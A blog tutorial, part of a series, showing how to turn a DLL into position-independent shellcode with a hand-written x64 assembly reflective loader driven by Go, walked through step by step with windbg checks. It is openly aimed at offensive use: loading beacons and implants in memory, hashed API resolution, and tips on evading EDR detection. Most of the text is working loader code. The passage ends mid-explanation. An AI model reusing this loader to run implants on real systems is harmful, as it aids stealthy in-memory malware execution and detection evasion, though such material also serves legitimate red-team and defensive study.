3. Transforming DLLs into Shellcode

#srdi #golang #assembly #x64 #shellcode #shellcodedevelopment

Introduction

A common technique used in offensive security is reflectively loading dlls in memory in order to spawn a beacon or to add functionality to an already existing implant. In some ways this is a stealthier way of executing code since we don't have to write a dll to disk and we don't generate any kernel alerting indicating a new module has been loaded in the process.

Also, turning the dll into shellcode gives additional flexibility since we can use our favourite shellcode loaders / injectors to execute dll code.

Fortra has recently release an article announcing that cobalt strike users could define their own reflective loader to help evading security solutions. Bobby Cooke from IBM X-Force Red has released this article to describe how a user defined loader has been implemented to cobalt strike.

Let's do a deep dive on how to write a reflective loader in assembly, that turns any dll into position independent shellcode.

DLL -> Shellcode

In this article I went through the code of creating a reflective loader using Go. Turning a dll into shellcode involves taking the bytes of a dll and append (or prepend) the code described in the above article to the dll bytes.

For this project we will structure the shellcode as shown in the image below:

Once we run the code we will hit a jump instruction. This instruction will help us jump over the DLL bytes and DLL size to the shellcode were all the magic happens. We could have the Reflective loader at the very top instead of having a jmp instruction but that would make the development process a bit harder as I would have to constantly modify the offsets as my shellcode grew.

Our shellcode will then allocate some memory in the Heap, copy over the headers, sections modify a few bits, assign it execute privileges and hopefully the dll will run.

Pre-requisites

Anyone attempting to follow the next section should be familiar with the following subjects:

Recommendations

I recommend following along in your debugger to truly understand the implementation below. It's hard to follow assembly in a blog 😄

The full code can be found here:

https://github.com/scriptchildie/GoDll2Shellcode

Code Break down

Read DLL bytes

As per the structure we defined the first instruction in our shellcode will be a jmp instruction that will take us on the first line of the Reflective Loader.

dllBytes, err := os.ReadFile("mydll.dll")
if err != nil {
	log.Fatalf("Failed to open file %v", err)
}

sizeBytes := uint64ToBytes(uint64(len(dllBytes)))

jmpInstruction := fmt.Sprintf("jmp 0x%x;", len(dllBytes)+13)

The above code reads the contents of the dll file and writes them into a byte slice dllBytes. It then turns the size into 64-bit unsigned integer.

The last line creates the string in the format keystone-engine expects it to be in order to turn it to opcodes.

So if the size of the dll is 20-bytes the jmp instruction will jump forward 33-bytes.

  • 20 bytes (dll bytes)

  • 8 bytes (the size value at the end of the bytes)

  • 5 bytes for the jmp instruction

Shellcode Prologue

"Prologue:",
"	push r12;",		//Push non-volatile registers to stack
"	push r13;",
"	push r14;",
"	push r15;",
"	push rsi;",
"	push rdi;",
"	push rbx;",
"	push rbp;",
"	mov rbp,rsp;",	// move rsp to rbp (use rbp as reference for local variables / not x64 standard)
"	and rsp,0x0FFFFFFFFFFFFFFF0;",	// stack alignment
"	sub rsp,0x200;",			// create stack space

If we want our main program to continue executing after running our shellcode we should preserve all non-volatile registers as per the windows x64 convention.

  • Lines 2-9: push all non-volatile registers to stack

  • Line 10: This is not best practise for x64 but I find it easier to have rbp as a reference for my local variables.

  • Line 11: Setting the last 4-bits to 0 ensures that our stack stays 16-byte aligned. We could face random crashes if our stack is not aligned.

  • Line 12: We create space in our stack for our local variables.

Calculating offsets

"       lea rdi, [rip - 0x29];",       // Get the address of the dll size
"       mov rax, [rdi];",            //DLL size
"	sub rdi, rax;",                //base address of the raw dll bytes
" 	mov qword ptr [rbp],rax;",    // push size of DLL to stack
" 	mov qword ptr [rbp-8],rdi;",  // push base address of the raw dll bytes to stack
  • Line 1 : Gets the address where our dll size is kept

If you would like to follow along and you would like to add a break point it should be added below this instruction. That's because it uses rip as a reference and anything added on top of this instruction will mess up the hardcoded 0x29 offset to the dll size.

  • Line 2: Get the dll size in rax

  • Line 3: Sub the dll size from the address to get the base address of the dll

  • Line 4: Push the dll size to stack

  • Line 5: push base address of the dll to stack

Since my asm code is expected to become very long by the time it's complete, I like to keep an index of what's stored where in the stack in case I would like to access it later on in the code. This is how it looks by the time my shellcode is complete.

/*
		[rbp] 		-> dll size
		[rbp-0x8] 	-> dllPtr base address of the raw dll bytes
		[rbp-0x10]	-> ntdll.dll base address
		[rbp-0x18]	-> kernel32.dll base address
		[rbp-0x20]	-> ntheader address
		[rbp-0x28]	-> fileheader address
		[rbp-0x30]	-> optional header address
		[rbp-0x38]      -> dllBase address
		[rbp-0x40] 	-> deltaImageBase
		[rbp-0x48]      -> CurrentProcess Handle 0xfffffff..
*/

Checking quickly if we have the right values in windbg. So rax holds the value 0xb55e. That's the equivalent of 46430.

Cross checking the size of the dll on disk we can confirm that this is the right value.

And rdi points to the beginning of the dll.

Finding Kernel32 & GetProcAddress

These functions are explained in detail in me previous blog.

Reflective loader start

The actual reflective loader code starts below:

"reflective_loader:",
"	xor rax,rax;",
"	mov rdi, [rbp-8];",              // Get the address raw dll
"	mov eax, dword ptr [rdi+0x3c];", // e_lfanew -> ax
"	add rdi,rax;",                   // Address of ntheader
" 	mov qword ptr [rbp-0x20],rdi;", //  push address of ntheader to stack
"	add rdi,0x4;",                   // address of file header
" 	mov qword ptr [rbp-0x28],rdi;", //  push address of fileheader to stack
"	add rdi,0x14;",                  // address of file header
" 	mov qword ptr [rbp-0x30],rdi;", //  push address of optional to stack
"	mov eax, dword ptr [rdi+0x38];", // size of image to eax
"	push rax;",                      //push size of image to stack eax to be used from parse_module
"	mov rax, qword ptr [rdi+0x18];", // imagebase to rax
"	push rax;",

The aim of the above code is to identify the size of the dll in order to allocate the right size in the upcoming VirtualAlloc API call.

  • Line 3: Move base address of dll in rdi

  • Line 4: Get the nt header offset to eax.

A quick check to ensure we have the right value in eax:

000001ee`65c6b62d 8b473c          mov     eax,dword ptr [rdi+3Ch] ds:000001ee`65c60041=00000080
0:000> 
000001ee`65c6b630 4801c7          add     rdi,rax
0:000> r eax
eax=80

We can see that File address of new exe header is 80 so we have the right value

  • Lines 5-10: A series of calculations to calculate the addresses of nt, file and optional headers. We also store them in the stack in case they are needed in the upcoming code.

Let's check if rdi on line 10 holds the address of the optional header. We expect to see the value 20B.

So cross checking in windbg shows the right value. Great.

0:000> dw rdi L1
000001ee`65c6009d  020b

Line 11 & 13: Move the size of the image to eax and the image base to rax followed by a push instruction

We can see that at offset B0 and D0 we have the desired values. When we check the stack we should find those values stored.

0:000> dq rsp L2
000000a2`551ff7f0  00000003`ae720000 00000000`00013000

VirtualAlloc - Allocate memory for our dll

LPVOID VirtualAlloc(
  [in, optional] LPVOID lpAddress,
  [in]           SIZE_T dwSize,
  [in]           DWORD  flAllocationType,
  [in]           DWORD  flProtect
);
  • lpAddress will be set to the the ImageBase (if available)

  • dwSize will be equal to the Size of Image

  • flAllocationType = MEM_RESERVE | MEM_COMMIT = 0x3000

  • flProtect = PAGE_EXECUTE_READWRITE = 0x40

If you plan on using this code in real world engagement the PAGE_EXECUTE_READWRITE permissions will most likely get investigated by the EDR.

Also it might be a better idea use indirect syscalls to call these functions

We now have to assign these values to rcx,rdx,r8 and r9 before making the function call.

"call_virtualAlloc:",
"       mov r9,qword ptr [rbp-0x18];", // move kernel32 base address to r9 for parse_module
"       mov r8d, 0x91afca54;",         // VirtualAlloc Hash
"       call parse_module;",           // Search and obtain address of VirtualAlloc
"	pop rcx;",                       // imagbase to rcx
"	mov rsi,rcx;",                   //save the value for later
"	pop rdx;",                       // image soze to rdx
"	mov r8, 0x3000;",                //MEM_RESERVE | MEM_COMMIT = 0x3000
"	mov r9, 0x40;",                  //PAGE_EXECUTE_READWRITE = 0x40
"	sub rsp,0x20;", // shadow space
"	call rax;",     // call VirtualAlloc
"	add rsp,0x20;", // restore stack
" 	mov qword ptr [rbp-0x38],rax;", //  push dllBase address to stack
"	sub rax,rsi;",                   // deltaImageBase to be used later
" 	mov qword ptr [rbp-0x40],rax;", //  push deltaImageBase to stack

Lines 2-4: Use the parse_module to get the address of virtual alloc:

  • r9 -> kernel32 base address

  • r8d -> VirtualAlloc hash calculated using this script

  • Line 5: Pop imagebase from the stack to rcx (first argument)

  • Line 7: Pop image size from the stack to rdx ( second argument)

  • Line 8: r8 = 0x3000 (third argument)

  • Line 9: r9 = 0x40 (fourth argument)

  • Lines 10&12: Allocate shadow space as per the x64 calling convention.

  • Line 13: Store the allocated address to the stack

  • Line 14: Calculate the difference between desired address and allocated address (if different). It will be useful later on when we are relocating hardcoded addresses.

  • Line 15: Save the address difference to the stack

Copy DLL Headers

To simplify the Proof of Concept we are using WriteProcessMemory to copy the headers to the destination address. WriteProcessMemory is monitored by most EDRs so it might cause our payload to be flagged. It should be easy enough to write a memcpy function in assembly.

In this section we are using 2 windows APIS

GetCurrentProcess

HANDLE GetCurrentProcess();

This API doesn't take any arguments and it always returns -1 (0xFFF..). We could hardcode this value but it's not recommended by Microsoft.

"call_currentProcess:",
"   mov r9,qword ptr [rbp-0x18];", // move kernel32 base address to r9 for parse_module
"   mov r8d, 0x7b8f17e6;",         // GetCurrentProcess Hash
"   call parse_module;",           // Search and obtain address of GetCurrentProcess
"   call rax;",                      // call GetCurrentProcess
"   mov qword ptr [rbp-0x48],rax;", //  push Current Process handle to stack

Line 2: Similarly with the previous functions we have kernel32 base address in r9

Line 3: The hash of the function in r8

Line 4: Call parse_module to get the function address

Line 5: And call rax where the function address is stored.

Line 6: We then save the handle to the stack

WriteProcessMemory

BOOL WriteProcessMemory(
  [in]  HANDLE  hProcess,
  [in]  LPVOID  lpBaseAddress,
  [in]  LPCVOID lpBuffer,
  [in]  SIZE_T  nSize,
  [out] SIZE_T  *lpNumberOfBytesWritten
);

Let's have a quick look on what the arguments should be:

  • hProcess = The pseudo handle output from the GetCurrentProcess() function

  • lpBaseAddress = The output from the VirtualAlloc() function

  • lpBuffer = Raw DLL bytes

  • nSize = Size of headers from optional header

  • lpNumberOfBytesWritten = Pointer to the stack.

Let's see how does this translate in assembly code.

"call_writeprocessmemory:",         // Write headers to the target address
"       mov r9,qword ptr [rbp-0x18];",  // move kernel32 base address to r9 for parse_module
"       mov r8d, 0xd83d6aa1;",          // WriteProcessMemory Hash
"       call parse_module;",            // Search and obtain address of WriteProcessMemory
"       mov rcx,qword ptr [rbp-0x48];", // current process handle
"	mov rdx,qword ptr [rbp-0x38];",   //dll base
"	mov r8,qword ptr [rbp-0x8];",     // raw bytes of dll
"	xor r9,r9;",
"	push r9;",                       // Placeholder for the bytesWritten
"	mov r9d, dword ptr [rdi+0x3c];", // Size of headers to r9
"       lea rsi, [rsp];",              //place to write the byteswritten
"	push rsi;",
"	sub rsp,0x20;", // shadow space
"	call rax;",     // call WPM
"	add rsp,0x20;", // restore stack

As always Lines 1-4: We pass kernel32 base address to r9, WriteProcessMemory hash to r8d and we call parse_module.

Now it's a good time to refer to our index to find where are the desired values on the stack

/*
		[rbp] 		-> dll size
		[rbp-0x8] 	-> dllPtr base address of the raw dll bytes
		[rbp-0x10]	-> ntdll.dll base address
		[rbp-0x18]	-> kernel32.dll base address
		[rbp-0x20]	-> ntheader address
		[rbp-0x28]	-> fileheader address
		[rbp-0x30]	-> optional header address
		[rbp-0x38]      -> dllBase address
		[rbp-0x40] 	-> deltaImageBase
		[rbp-0x48]      -> CurrentProcess Handle 0xfffffff..
*/
  • line 5: rcx = Moved the pseudohandle to rcx

  • line 6: rdx = Moved the dll base to rdx

  • line 7: r8 = Moved the raw dll bytes to r8

  • line 10: Move size of headers from optional header + offset 0x3c

  • Line 9-11: Create a zero qword onto the stack, Get a pointer to the location and push to the stack since this is the 5th argument.

  • Line 13-15: Create shadow space and call function

We have done quite a lot, let's see if we get the values we expect before and after the call instruction in windbg.

0:000> r rcx,rdx,r8,r9 ; dq rsp L1
rcx=ffffffffffffffff rdx=00000003ae720000 r8=0000014afbf00005 r9=0000000000000600
00000006`8bdff490  00000006`8bdff498
0:000> dq 00000006`8bdff498
00000006`8bdff498  00000000`00000000

Everything looks as we expect them before the call. Let's see if the 0x600 bytes are written to the destination memory after the call.

0:000> dq 00000006`8bdff498 L1 
00000006`8bdff498  00000000`00000600

The variable lpNumberOfBytesWritten is set to 0x600, but let's double check the destination memory if it has the same contents as the buffer.

0:000> db 00000003ae720000 L 30; db 0000014afbf00005 L 30 
00000003`ae720000  4d 5a 90 00 03 00 00 00-04 00 00 00 ff ff 00 00  MZ..............
00000003`ae720010  b8 00 00 00 00 00 00 00-40 00 00 00 00 00 00 00  ........@.......
00000003`ae720020  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................

0000014a`fbf00005  4d 5a 90 00 03 00 00 00-04 00 00 00 ff ff 00 00  MZ..............
0000014a`fbf00015  b8 00 00 00 00 00 00 00-40 00 00 00 00 00 00 00  ........@.......
0000014a`fbf00025  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................

All is looking good :)

Copy DLL Sections

The background knowledge of what we are trying to achieve can be found here and the Go code here.

Let's dive into the assembly

Number of sections

"copy_sections:",                 //Copy sections to the target address
"	mov r13,qword ptr [rbp-0x30];", // Optional header -> rsi
"	add r13, 0xf0;",                // Section header = Optionalheader + 0xf0 -> rsi
"	mov rdi,qword ptr [rbp-0x28];", // fileheader address -> rdi
"	mov ax, word ptr [rdi+0x2];",   // FileHeader.NumberOfSections -> ax
"	mov rdi,rax;",                  // rax volatile writeprocess memory would erase

Before copying the sections to the destination address we need to identify the section header address and the number of sections

  • Line 2-3: Section header is located at offset +0xf0 from the optional header

  • Line 4: Move fileheader address to rdi

  • Line 5: Move number of sections to rax

  • Line 6: Store the in rdi

Copy sections loop

"copy_sections_loop:",
"	cmp rdi,0;",                      //check if loop is finished
"	je copy_sections_loop_finished;", // jump out of the loop

"       mov r9,qword ptr [rbp-0x18];", // move kernel32 base address to r9 for parse_module
"       mov r8d, 0xd83d6aa1;",         // WriteProcessMemory Hash
"       call parse_module;",           // Search and obtain address of WriteProcessMemory

"       mov rcx,qword ptr [rbp-0x48];", // current process handle
"	mov rdx,qword ptr [rbp-0x38];",   //dll base
"	xor r12,r12;",                    // 0 -> r12
"	mov r12d,dword ptr [r13+0xc];",   // section.VirtualAddress -> r12d
"	add rdx,r12;",                    // dllbase + sectionVA
		
"	mov r8,qword ptr [rbp-0x8];",    // raw bytes of dll
"	mov r12d,dword ptr [r13+0x14];", // section.PointerToRawData              -> r12d
"	add r8,r12;",                    //dllPtr+section.PointerToRawData
"	xor r9,r9;",
"	push r9;",                       // Placeholder for the bytesWritten
"	mov r9d, dword ptr [r13+0x10];", // SizeOfRawData
"       lea r11, [rsp];",              //place to write the byteswritten
"	push r11;",
"	sub rsp,0x20;", // shadow space
"	call rax;",     // call WPM
"	add rsp,0x20;", // restore stack
	// WPM E
"	dec rdi;",                // rax--;
"	add r13, 0x28;",          // point to the beginning of the next section header
"	jmp copy_sections_loop;", // next iteration

"copy_sections_loop_finished:",
"	nop;",

The above code might look scary at first but let's break it down:

  • Line 2: Line 2 checks if rdi is zero. rdi holds the number of sections and the value decrements by 1 with each iteration.

  • Line 3: If rdi == 0 it means that all sections have been copied and we should break off the loop by jumping to line 32 (copy_sections_loop_finished).

  • Lines 5-7: Identify WriteProcessMemory using parse_module

WriteProcessMemory args

Let's have a quick look what arguments we will be passing to WriteProcess Memory

  • hProcess = The pseudo handle output from the GetCurrentProcess() function

  • lpBaseAddress = Base address + RVA of the section

  • lpBuffer = Base address of Raw DLL bytes + Raw Address

  • nSize = Size of Raw Data

  • lpNumberOfBytesWritten = Pointer to the stack.

  • Line 12: Moves Relative Virtual Address from the section header to r12

  • Line 13: Calculates the Virtual Address by adding base address (from VirtualAlloc)

  • Line 16: Moves the pointer of Raw data to r12

  • Line 17: Adds the base address of the raw bytes

  • Line 20: Moves the size of raw data

Let's have a quick look at the data when the WriteProcessMemory function is called for the first time.

0:000> r rcx,rdx,r8,r9 ; dq rsp L2
rcx=ffffffffffffffff rdx=00000003ae721000 r8=0000014afbf00605 r9=0000000000001600
00000006`8bdff480  00000006`8bdff488 00000000`00000000

The data matches to the .text section data we see from the PE-bear section

  • Line 27: Decrements the sections counter by 1

  • Line 28: Adds 0x28 to r13, It points to the beginning of the next section

  • Line 29: Jumps at the beginning of the loop

Memory Relocations

With all our sections in place the next task is to find all the hardcoded addresses in our code, and add the deltaImageBase we calculated earlier in our code.

The background knowledge can be found here and the go code here.

Let's have dive into the assembly.


"memory_relocations:",            // start memory relocations
"	mov r13,qword ptr [rbp-0x30];", // Optional header -> r13
"	add r13, 0x98;",                // Points to IMAGE_DIRECTORY_ENTRY_BASERELOC
"	mov eax, dword ptr[r13];",      // relocations.VirtualAddress ->rax
"	add rax,qword ptr [rbp-0x38];", // relocation_table
"	xor rdi,rdi;",                  // relocations_processed counter

"memory_relocations_loop:",
"	mov rsi,rax;",
"	add rsi,rdi;",                //relocation block (relocation_table + relocations processed) -> rsi
"	mov r8d, dword ptr [rsi];",   //PAGERVA
"	mov r9d, dword ptr [rsi+4];", //BlockSize
"	mov rcx,r9;",                 //Block size -> rcx
"	sub rcx,0x8;",                // BLocksize-8 ->rcx
"	shr rcx,1;",                  // Blocksize/2 -> rcx
"	xor r10,r10;",
"	or r10d,r9d;",
"	or r10d,r8d;",
"	test r10d,r10d;", //check r10d is zero
"	jz exit_relocations_loop;",
"	add rsi, 0x8;", // relocEntry

"relocation_entries_loop:",
"	cmp rcx,0;",
"	je relocation_entries_loop_end;", // jump out of the loop
"	mov r11d,dword ptr [rsi];",
"	and r11d,0xf000;",
"	shr r11d,12;",                             //type -> r11
"	test r11,r11;",                            //test if r11 is 0
"	jz relocation_entries_loop_inc_counters;", //continue

"	mov r11d,dword ptr [rsi];", //type -> r11
"	and r11d,0xfff;",
"	mov r13,r8;",
"	add r13,r11;", //relocationRVA
"	add r13, qword ptr[rbp-0x38];", //absolute address of relocation
"	mov r12, qword ptr[r13];",      //  address to patch -> r9
"	add r12, qword ptr[rbp-0x40];", // address to patch  + delta
"	mov qword ptr[r13], r12;",      // patch

"relocation_entries_loop_inc_counters:",
"	dec rcx;",
"	add rsi, 0x2;",
"	jmp relocation_entries_loop;",

//end of relocations entries loop
"relocation_entries_loop_end:",
"	add rdi,r9;",                  // point to the next relocationblock
"	jmp memory_relocations_loop;", //iterate

"exit_relocations_loop:",

The code is fairly long but let's break it down.

We have the outer loop ( memory_relocations_loop) that loops through the relocation Blocks and within each block we have the inner loop that loops through the entries.

For mydll.dll example this is how the relocations look like:

The outer loop will loop 4 times as it can be seen at the very top. The inner loop for the block at offset 0x360C will iterate over the 0x10 (16) entries.

Address of relocations

"memory_relocations:",            // start memory relocations
"	mov r13,qword ptr [rbp-0x30];", // Optional header -> r13
"	add r13, 0x98;",                // Points to IMAGE_DIRECTORY_ENTRY_BASERELOC
"	mov eax, dword ptr[r13];",      // relocations.VirtualAddress ->rax
"	add rax,qword ptr [rbp-0x38];", // relocation_table
"	xor rdi,rdi;",                  // relocations_processed counter
  • Line 3: Relocation Blocks RVA is located at offset 0x98 from the beginning of the optional header.

  • Line 4: RVA Value stored in eax

  • Line 5: Add base address to get the relocation_table address in memory

  • Line 6: Zero rdi to use as a loop counter in the next section

Relocations Block (Outer Loop)

"memory_relocations_loop:",
"	mov rsi,rax;",                // relocation_table
"	add rsi,rdi;",                //relocation block (relocation_table + relocations processed) -> rsi
"	mov r8d, dword ptr [rsi];",   //PAGERVA
"	mov r9d, dword ptr [rsi+4];", //BlockSize
"	mov rcx,r9;",                 //Block size -> rcx
"	sub rcx,0x8;",                // BLocksize-8 ->rcx
"	shr rcx,1;",                  // Blocksize/2 -> rcx
"	xor r10,r10;",
"	or r10d,r9d;",
"	or r10d,r8d;",
"	test r10d,r10d;", //check r10d is zero
"	jz exit_relocations_loop;",
"	add rsi, 0x8;", // relocEntry
...
...

"	add rdi,r9;",                  // point to the next relocationblock
"	jmp memory_relocations_loop;", //iterate

"exit_relocations_loop:",
  • Line 2: Move relocation_table address to rsi

  • Line 3: Line 3 adds the rdi to rsi, in order to point to the next relocation block

  • Line 4: Move PAGERVA in r8

  • Line 5: Move Block Size in r9

  • Line 6-9: relocationsCount := (relocation_block.BlockSize - 8) / 2

We are essentially turning the relocation blocksize to the number of relocation entries in the block. This will be used later in the inner loop.

  • Line 7: Subtracts 8 from the block size in rcx

  • Line 8: Performs a right shift on rcx by 1 bit, essentially dividing the value in rcx by 2

  • Lines 10-12 test if PAGERVA or BlockSize is zero

  • Line 13: If any of those values is zero the loop exits

  • Line 14: If none of them are zero we add 0x8 to rsi to get the address of the first relocation entry

  • Line 15: will have our inner loop that rotates through the entries

  • Line 18: Adds the block size to rdi in order to reach the next block on the next iteration

  • Line 19: Jumps back to the beginning of the loop

When writing loops it will make sense to set a break point to line 14 in this case to make sure that it points to the first entry of each block.

Also another break point at the exit_relocation_loop to ensure it exits the loop when we expect it to do

A quick check confirms that our loop performs as expected:

0:000> bp 0000014a`fbf0b775
0:000> g
Breakpoint 0 hit
0000014a`fbf0b775 4883c608        add     rsi,8
0:000> p
0000014a`fbf0b779 4883f900        cmp     rcx,0
0:000> dw rsi L1 
00000003`ae72c008  a558
..
0:000> dw rsi L1 
00000003`ae72c014  a010

Relocation Entries Loop (inner loop)

"relocation_entries_loop:",
"	cmp rcx,0;",
"	je relocation_entries_loop_end;", // jump out of the loop
"	mov r11d,dword ptr [rsi];",
"	and r11d,0xf000;",
"	shr r11d,12;",                             //type -> r11
"	test r11,r11;",                            //test if r11 is 0
"	jz relocation_entries_loop_inc_counters;", //continue

"	mov r11d,dword ptr [rsi];", //type -> r11
"	and r11d,0xfff;",
"	mov r13,r8;", // r8 holds page RVA
"	add r13,r11;", //relocationRVA

"	add r13, qword ptr[rbp-0x38];", //absolute address of relocation
"	mov r12, qword ptr[r13];",      //  address to patch -> r9
"	add r12, qword ptr[rbp-0x40];", // address to patch  + delta
"	mov qword ptr[r13], r12;",      // patch

"relocation_entries_loop_inc_counters:",
"	dec rcx;",
"	add rsi, 0x2;",
"	jmp relocation_entries_loop;",
  • Line 2: rcx holds the number of entries in the block and decrements with every iteration. Here we compare to 0 , which essentially checks if we already looped through all entries.

  • Line 3: If rcx was zero it jumps out of the loop into the outer loop

  • Line 4: Moves entry Value to r11d

Let's assume r11d now has the value 0xA558.

  • Line 5: will zero the last 12-bits essentially leave the value 0xA000 in r11d

  • Line 6: shifts right by 12 bits turning r11d to 0x000A

  • Line 7: checks if the remaining value is zero.

  • Line 8: Continues to the next entry by jumping at the end of the function where our counters are adjusted

  • Line 10: is identical to Line 4 moving the entry value to r11d

Once again let's assume the value is 0xA558

  • Line 11: Zeros the top 4 bits leaving the value 0x558 in r11d. This value is the RVA from the beginning of the PAGE.

  • Line 12: Move page rva to r13

  • Line 13: Add page rva to the reglocation rva to get the relocation RVA from the dll base address

  • Line 15: We add the base dll address to the relocation rva to get the absolute address

  • Line 16: We now get the actual hardcode address from memory into r12.

  • Line 17: We add the delta calulcated and stored in the stack previously to the hardcoded address

  • Line 18: Patch the address in memory

  • Line 21: Decrease the relocation entries counter

  • Line 22: Point to the next relocation entry in the block

Imports

The last step in our shellcode is to import all external dependencies. Once again we will need 2 loops just like we did for the relocations. As we can see from the Import tab in PE-bear, we have an entry for each DLL and then a list of functions for each dll.

Our outer loop will loop through the dlls, and the inner loop will loop through the functions and import them as required.

In the outer loop we will need to use an api such as LoadLibrary or LdrLoadDll to load the required dlls and then we can use our parse_module function to get the address of each function.

Let's see how the code looks in assembly.

"imports:",
"	mov r13,qword ptr [rbp-0x30];", // Optional header -> r13
"	add r13, 0x78;",                // Points to IMAGE_DIRECTORY_ENTRY_BASERELOC
"	mov r12d, dword ptr[r13];",      // imports.VirtualAddress ->rax
"	add r12,qword ptr [rbp-0x38];", // Import Descriptor address


"imports_loop:",
//r12 -> import descriptor address

"	mov r13, r12;",                  // rax points to the beginning of the import
"	add r13, 0x0c;",                 // offset 0xc points to the name RVA
"	mov r13d, dword ptr[r13];",      //dereference to get RVA value to r13
"	cmp r13d, 0x0;",                 //check if RVA is 0
"	je exit_imports_loop;",          // exit loop if RVA ==0
"	add r13, qword ptr [rbp-0x38];", // dll name address
"	mov rsi,r13;",                   // used by loadsb

/*
   typedef struct _UNICODE_STRING {
     USHORT Length;
     USHORT MaximumLength;
     PWSTR  Buffer;
     } UNICODE_STRING, *PUNICODE_STRING;
*/

"       xor rax,rax;", // used by loadsb
"       xor r11,r11;", // size
"       push rax;",    // Creating a space of 0s for the Unicode String Buffer
"       push rax;",
"       push rax;",
"       push rax;",
"       push rax;",
"       push rax;",
"       push rax;",
"       push rax;",
"       push rax;",
"       push rax;",
"       push rax;",

"loop_through_DLL:",            // Iterate over each byte
" 	lodsb;",                     // Copy the next byte of RSI to Al
" 	test al, al;",               // If reaching the end of the string
" 	jz end_loop_through_DLL;",   //
"	mov byte ptr [rsp+r11], al;", // In the buffer we write the dll name bytes in every second byte. (0s in between K.E.R.N.E.L.3.2.D.L.L..)
"	add r11w,0x2;",
" 	jmp loop_through_DLL;", // Next byte


"end_loop_through_DLL:", // Iterate over each byte
"	add r11w, 0x2;", // MaximumLength
"	mov ax,r11w;",
"	shl rax,16;",
"	sub r11w, 0x2;",    //Length
"	or rax,r11;",       // first qword is the length and max length
"       lea rsi, [rsp];", // pointer to the buffer
"	push rsi;",         //push pointer to the stack
"	push rax;",         // push lengts to the stack to form the UNICODE
"       lea rsi, [rsp];", // Pointer to the UNICODE_STRING
"	push rsi;",         // unicode string of the dll
"       mov r9,qword ptr [rbp-0x10];", // move ntdll base address to r9 for parse_module
"       mov r8d, 0xb0988fe4;",         // LdrLoadDll Hash

"       call parse_module;", // Search and obtain address of LdrLoadDll
"	xor rcx,rcx;",
"	inc rcx;",    // first arg 1
"	pop r8;",     // third arg Pointer to the unicode string on the stack
" 	xor r9,r9;", // 0 -> r9
"	push r9;",
"       lea rdx, [rsp];", // second arg null pointer
"       lea r9, [rsp];",  // fourth argument pointer the dll base address
"	mov rsi, r9;",

"	sub rsp,0x20;",         // shadow space
"	call rax;",             // call LdrLoadDll
"	add rsp,0x20;",         // restore stack
"	push r12;",             // import descriptor address -> stack
"	push qword ptr [rsi];", // address of dll to stack
"	mov r12d, dword ptr[r12+0x10];",
"	add r12,qword ptr [rbp-0x38];",

"inner_import_loop:",
"	mov r13d, dword ptr[r12];",      //dereference to get RVA value to r13
"	cmp r13d, 0x0;",                 //check if RVA is 0
"	je exit_inner_import_loop;",     // exit loop if RVA ==0
"	add r13, qword ptr [rbp-0x38];", //
"	add r13,0x2;",
"	mov rsi,r13;",

//"function_hashing:", // Hash function name function
" 	xor rax, rax;",
" 	xor rdx, rdx;",
" 	cld;", // Clear DF flag

"iteration2:",          // Iterate over each byte
" 	lodsb;",             // Copy the next byte of RSI to Al
" 	test al, al;",       // If reaching the end of the string
" 	jz getProcAddress;", // Compare hash
" 	ror edx, 0x0d;",     // Part of hash algorithm
" 	add edx, eax;",      // Part of hash algorithm
		" 	jmp iteration2;",    // Next byte

"getProcAddress:",
"	mov r8,r15;",
"       mov r9,qword ptr[rsp];", // move dll base address to r9 for parse_module
"       mov r8d, edx;",          // Hash
"       call parse_module;",     // Search and obtain address of GetCurrentProcess

"	mov qword ptr[r12],rax;", // write import
"	add r12,0x8;",           // point to next proc address
"	jmp inner_import_loop;", //loop

"exit_inner_import_loop:",
"	pop rax;",      // get rid of dll address
"	pop r12;",      // retrieve Import Descriptor address from stack
"	add r12,0x14;", // Point to the next import
"	jmp imports_loop;",

"exit_imports_loop:",

This is the longest part of the code so let's break it to smaller sections.

Import Descriptor Address

"imports:",
"	mov r13,qword ptr [rbp-0x30];", // Optional header -> r13
"	add r13, 0x78;",                // ImportDescriptor
"	mov r12d, dword ptr[r13];",      // imports.VirtualAddress ->rax
"	add r12,qword ptr [rbp-0x38];", // Import Descriptor address

Here we need to capture the address of the Import Descriptor.

  • Line 2: Move Optional Header address into r13

  • Line 3: Import Descriptor RVA is located at offset 0x78 in the OptionaHeader

  • Line 4: Move RVA value to r12

  • Line 5: Add the base dll value to the RVA in r12

Dll loop (outer loop)

DLL Name Address

"imports_loop:",

//r12 -> import descriptor address
"	mov r13, r12;",                  // rax points to the beginning of the import
"	add r13, 0x0c;",                 // offset 0xc points to the name RVA
"	mov r13d, dword ptr[r13];",      //dereference to get RVA value to r13
"	cmp r13d, 0x0;",                 //check if RVA is 0
"	je exit_imports_loop;",          // exit loop if RVA ==0
"	add r13, qword ptr [rbp-0x38];", // dll name address
"	mov rsi,r13;",                   // used by loadsb
  • Line 5: Name RVA is located at offset 0x0c from the beginning of the import descriptor

  • Line 6: Move RVA value into r13

  • Line 7: Compares RVA value to 0

  • Line 8: If the value is zero it breaks off the loop

  • Line 9: Calculates the absolute address by adding the DLL base address to the RVA

  • Line 10: Move absolute address to rsi

LdrLoadDll

It would be easier to just use LoadLibrary since all we have to provide to the API is a pointer to the name of the dll which already stored in rsi.

Instead we use LdrLoadDll which makes use of the UNICODE_STRING structure and is located in the ntdll. A few years back it would even be considered more stealthy, but I am not sure it's the case nowadays.

Let's take a look at the function definition.

LdrLoadDll(
  IN PWCHAR               PathToFile OPTIONAL,
  IN PULONG                Flags OPTIONAL,
  IN PUNICODE_STRING      ModuleFileName,
  OUT PHANDLE             ModuleHandle );

In order to understand the arguments passed to this (undocumented) function I ran LoadLibrary and set a breakpoint on the LdrLoadDll

  • PathToFile was set to 1

  • Flags was a pointer pointing to 0

  • ModuleFileName is a pointer to the UNICODE_STRING struct holding the name of the dll

  • A pointer to the address we would like the dll's base address to be returned

UNICODE_STRING

The arguments that LdrLoadDLL are straight forward except the UNICODE_STRING struct. Let's have a quick look on the struct definition

typedef struct _UNICODE_STRING {
  USHORT Length;
  USHORT MaximumLength;
  PWSTR  Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

Firstly we need to transform the dll name from a null terminated byte array to a wide character array. This essentially means that every character should bea word where the first byte is what we had already followed by another 0 byte. The null terminator will be two null bytes.

Let's take kernel32.dll as an example. In memory we currently have

4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00

When this is transformed to a Wide string this is how it will look in memory

